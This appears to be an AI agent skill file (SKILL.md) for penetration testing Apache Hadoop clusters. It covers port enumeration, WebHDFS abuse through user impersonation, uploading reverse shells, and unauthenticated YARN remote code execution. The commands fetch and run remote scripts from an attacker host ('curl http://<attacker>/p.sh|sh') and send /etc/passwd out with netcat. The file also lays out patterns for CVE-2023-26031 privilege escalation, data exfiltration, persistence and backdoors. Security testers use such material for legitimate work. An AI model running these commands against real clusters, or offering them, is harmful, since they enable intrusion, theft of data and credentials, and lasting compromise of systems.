Hacktricks-skills hadoop-pentest
How to enumerate and exploit Apache Hadoop clusters during penetration testing. Use this skill whenever you need to assess Hadoop security, test HDFS/WebHDFS access, exploit YARN RCE vulnerabilities, or check for CVE-2023-26031. Trigger on any mention of Hadoop, HDFS, YARN, MapReduce, distributed data processing security, or when you see ports 50030, 50060, 50070, 50075, 50090, 8088, 8042, 8031, 8032, 9870, 9864, or 14000 in a pentest engagement.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop/SKILL.MDHadoop Pentesting Skill
This skill helps you enumerate and exploit Apache Hadoop clusters during penetration testing. Hadoop is an open-source framework for distributed storage and processing of large datasets across computer clusters.
Quick Reference: Hadoop Ports
| Port | Service | Notes |
|---|---|---|
| 50030 | JobTracker | Legacy MapReduce |
| 50060 | TaskTracker | Legacy MapReduce |
| 50070 / 9870 | NameNode (WebHDFS) | Primary target for file operations |
| 50075 / 9864 | DataNode | Block storage |
| 50090 | Secondary NameNode | Metadata backup |
| 8088 | YARN ResourceManager | REST API & web UI - RCE target |
| 8042 | YARN NodeManager | Container management |
| 8031/8032 | YARN RPC | Often unauthenticated |
| 14000 | HttpFS | Alternative WebHDFS gateway |
Step 1: Enumerate Hadoop Services
Start by identifying which Hadoop services are exposed. Use Nmap with the built-in Hadoop scripts:
# Full Hadoop enumeration nmap -p 50030,50060,50070,50075,50090,8088,8042,8031,8032,9870,9864,14000 \ --script hadoop-jobtracker-info,hadoop-tasktracker-info,hadoop-namenode-info,\ hadoop-datanode-info,hadoop-secondary-namenode-info \ <target> # Or use the bundled script ./scripts/enumerate-hadoop.sh <target>
Key insight: Hadoop operates without authentication in its default setup. This is your primary attack vector.
Step 2: Exploit WebHDFS (Port 50070/9870/14000)
When
security=off, you can impersonate any user with the user.name parameter. This is the most common misconfiguration.
List HDFS directories
# List root directory curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs" # List specific path curl "http://<host>:50070/webhdfs/v1/user/<username>/?op=LISTSTATUS&user.name=hdfs"
Read arbitrary files from HDFS
# Read configuration files curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs" curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/hdfs-site.xml?op=OPEN&user.name=hdfs" curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/yarn-site.xml?op=OPEN&user.name=hdfs" # Read user data curl -L "http://<host>:50070/webhdfs/v1/user/<username>/data.csv?op=OPEN&user.name=hdfs"
Upload payloads
# Upload a web shell or binary curl -X PUT -T ./payload.sh \ "http://<host>:50070/webhdfs/v1/tmp/payload.sh?op=CREATE&overwrite=true&user.name=hdfs" \ -H 'Content-Type: application/octet-stream' # Upload an executable curl -X PUT -T ./reverse_shell \ "http://<host>:50070/webhdfs/v1/tmp/reverse_shell?op=CREATE&overwrite=true&user.name=hdfs" \ -H 'Content-Type: application/octet-stream'
Use the bundled script for common WebHDFS operations:
./scripts/webhdfs-abuse.sh <host> <port> <operation> <path>
Operations:
list, read, upload, download
Step 3: Exploit YARN Unauthenticated RCE (Port 8088)
The ResourceManager REST API accepts job submissions with no authentication in default "simple" mode. This allows arbitrary command execution without needing HDFS write access.
Method 1: DistributedShell (Recommended)
# 1) Get an application ID APP_ID=$(curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application | \ jq -r '.application-id') # 2) Submit a job with your command curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \ -H 'Content-Type: application/json' \ -d '{ "application-id":"'"$APP_ID"'", "application-name":"pwn", "am-container-spec":{ "commands":{"command":"/bin/bash -c \"curl http://<attacker>/p.sh|sh\""} }, "application-type":"YARN" }'
Method 2: Using the bundled script
./scripts/yarn-rce.sh <host> <command> # Examples: ./scripts/yarn-rce.sh 10.0.0.5 "whoami" ./scripts/yarn-rce.sh 10.0.0.5 "curl http://attacker/reverse.sh|sh" ./scripts/yarn-rce.sh 10.0.0.5 "cat /etc/passwd | nc attacker 4444"
Method 3: YARN RPC (Ports 8031/8032)
If these ports are exposed, older clusters allow job submission over protobuf without authentication. Treat these as RCE vectors as well.
Step 4: Check for CVE-2023-26031 (Local PrivEsc)
Hadoop 3.3.1–3.3.4 container-executor loads libraries from a relative RUNPATH. If you can run YARN containers (including via remote submission on insecure clusters), you may drop a malicious
libcrypto.so in a writable path and get root when container-executor runs with SUID.
Check for vulnerability
# Check RUNPATH configuration readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH' # Vulnerable if it contains $ORIGIN/:../lib/native/ # Check SUID bit ls -l /opt/hadoop/bin/container-executor # SUID+root makes it exploitable # Check Hadoop version hadoop version # Vulnerable: 3.3.1, 3.3.2, 3.3.3, 3.3.4 # Fixed: 3.3.5+
Use the bundled check script
./scripts/check-cve-2023-26031.sh
This script will:
- Check if container-executor exists
- Verify SUID bit is set
- Check RUNPATH for vulnerable configuration
- Report Hadoop version
- Provide exploitation guidance if vulnerable
Step 5: Kerberos Authentication Bypass
If Kerberos is enabled, you can still attempt authentication with valid tickets:
# Use existing Kerberos ticket curl --negotiate -u : "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS" # Or with specific ticket curl --negotiate -u : -H "Authorization: Negotiate <ticket>" \ "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS"
Common Attack Patterns
Pattern 1: Full Cluster Compromise
- Enumerate with Nmap
- Read HDFS configuration files to understand cluster topology
- Upload reverse shell to
via WebHDFS/tmp/ - Submit YARN job to execute the shell
- Check for CVE-2023-26031 for privilege escalation
- Pivot to other nodes using discovered credentials
Pattern 2: Data Exfiltration
- Enumerate HDFS directories
- Identify sensitive data paths (user data, configs, credentials)
- Download files via WebHDFS
op=OPEN - For large files, use
with range headersop=GETCONTENT
Pattern 3: Persistence
- Upload malicious scripts to HDFS
- Create YARN jobs that run periodically
- Modify Hadoop configuration if write access allows
- Install backdoors in container-executor if CVE-2023-26031 is present
Important Notes
- Default configuration is insecure: Hadoop ships with
by defaultsecurity=off - No Metasploit support: Use Nmap scripts and manual exploitation
- Kerberos is optional: Many deployments never enable it
- YARN RPC ports are often forgotten: Check 8031/8032 even if 8088 is filtered
- CVE-2023-26031 is critical: If you have YARN access, always check for this
References
Scripts
This skill includes the following helper scripts in
scripts/:
- Nmap-based Hadoop service enumerationenumerate-hadoop.sh
- WebHDFS operations (list, read, upload, download)webhdfs-abuse.sh
- YARN RCE exploitation via DistributedShellyarn-rce.sh
- CVE-2023-26031 vulnerability checkcheck-cve-2023-26031.sh
Run
./scripts/<script-name>.sh --help for usage details.